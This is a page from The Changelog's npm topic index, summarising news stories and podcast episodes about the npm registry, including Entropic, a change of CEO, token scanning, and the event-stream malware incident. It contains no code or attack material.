npm Icon

npm

npm is a package manager for JavaScript included with Node.js.
22 Stories
All Topics

The Changelog The Changelog #355

Federating JavaScript's language commons with Entropic

We’re joined by C J Silverio, aka ceejbot on Twitter, aka 2nd hire and former CTO at npm Inc. We talk with Ceej about her recent JS Conf EU talk titled “The Economies of Open Source” where she laid our her concerns with the JavaScript language commons being owned by venture capitalists. Currently the JavaScript language commons is controlled by the npm registery, and as you may know, npm is a VC backed for profit start up. Of course we also talk with Ceej about the bomb she dropped, Entropic, at the end of that talk — a federated package registry for JavaScript C J hopes will unseat npm and free the JavaScript language commons.

read more

Thomas Claburn theregister.co.uk

npm, Inc settled its labor rights union-busting battle

With the settlement behind it, NPM Inc can now turn its attention toward repairing relationships with the JavaScript community and generating enough revenue to sustain itself. I’d like to know what the current sentiment is towards npm after this settlement. Can they mend these community fences? Or, are you more hopeful of the “development of alternative technologies” as mentioned in this post?

read more

npm blog.npmjs.org

npm token scanning extending to GitHub

The npm team is collaborating with GitHub on a new service that will automatically check for tokens that might have been accidentally pushed up to a repository and then automatically revoke them if they are valid. This will help to quickly mitigate attack vectors that might arise from the accidental oversharing of credentials for projects. From the post: Whenever you commit or push a change to GitHub in a public repository and an npm token is found in the change, it is sent to npm for validation. If it’s valid, we will revoke it and notify the maintainer of this action via email.

read more

JavaScript github.com

Pika brings that nostalgic, 2014 simplicity to 2019 web development

Install npm dependencies that run natively in the browser… without a bundler! Pika’s mission is to make modern JavaScript more accessible by making it easier to find, publish, install, and use modern packages on npm. There’s a lot to digest here in terms of how it works (spoiler: Rollup), which packages you can use with it (spoiler: ESM required), and how it performs. On that topic: When served with HTTP/2, @pika/web installations perform better in production than single “vendor” JavaScript bundles and most custom dependency bundling strategies due to the comparable load performance + more efficient cache usage.

read more

Founders Talk Founders Talk #61

Isaac Schlueter on building npm and hiring a CEO

With JavaScript in every corner of software development and npm in every corner right along with it, the rise of npm can be drawn as a hockey stick up and to the right with Isaac Schlueter at the top grinning ear to ear. After reading their recent announcement to hire a CEO, I knew it was time to talk one-on-one with Isaac about building npm and the journey of hiring his successor.

read more

Isaac Schlueter blog.npmjs.org

npm has a new CEO

npm has faced some interesting challenges with project creator and co-founder Isaac Schlueter playing the role of leading the company AND the product. I’m excited to see how this new leadership and focus for Isaac plays out for npm and the greater JavaScript community. In this post, Isaac shares some backstory and details about this transition: Today, I’m happy to introduce Bryan Bogensberger as npm, Inc.’s CEO. He brings a wealth of experience in Open Source and a ton of excitement and expertise to help grow npm to the next level and beyond. Commercializing something like this without ruining it is no small task, and building the team to deliver on npm’s promise is a major undertaking. We’ve sketched out a business plan and strategy for the next year, and will be announcing some other key additions to the team in the coming months. Meanwhile, I’ve taken on the title of Chief Product Officer and I will be spending my time focused on the part of the problem that I love.

read more

Jake Archibald jakearchibald.com

What happens when packages go bad?

See what happens when a rogue evil dependency explores ways to attack the developer, server, the end user, plus other examples. Jake Archibald recently experienced a small hack (break-in) on an old website. As a thought exercise, he explored various scenarios with the kind of “powers an evil dependency could have, and what, if anything, could be done to prevent it.” Jake went on to say, … It’s been terrifying to think this through, and this is just for a static site. … For sites with a server component and database, it feels negligent to use packages you haven’t audited. With Copay, we’ve seen that attacks like this aren’t theoretical, yet the auditing task feels insurmountable.

read more

The Changelog The Changelog #326

The insider perspective on the event-stream compromise

Adam and Jerod talk with Dominic Tarr, creator of event-stream, the IO library that made recent news as the latest malicious package in the npm registry. event-stream was turned malware, designed to target a very specific development environment and harvest account details and private keys from Bitcoin accounts. They talk through Dominic’s backstory as a prolific contributor to open source, his stance on this package, his work in open source, the sequence of events around the hack, how we can and should handle maintainer-ship of open source infrastructure over the full life-cycle of the code’s usefulness, and what some best practices are for moving forward from this kind of attack.

read more

npm github.com

Find the cost of adding a new dependency to your project

Do you have packagephobia? Maybe you should… If you don’t, you just might after using this tool: Package Phobia reports the size of an npm package before you install it. This is useful for inspecting potential dependencies or devDependencies without using up precious disk space or waiting minutes for npm install. Ain’t nobody got time for dat.

read more

Spencer Brown mixmax.com

To yarn and back (to npm) again

Yarn and npm was discussed in-depth on JS Party #29. Spencer writes on the Mixmax blog: We tested that this flow with npm 6 would work for our needs and we suggest you do too. If you need the absolute fastest package manager, then you may still find Yarn to be best. But if you’re looking to simplify your setup, we’ve found that npm 6 recaptures a critical balance between speed and reliability. Spencer and team also shared deyarn a command-line tool for converting your projects from Yarn to npm.

read more

0:00 / 0:00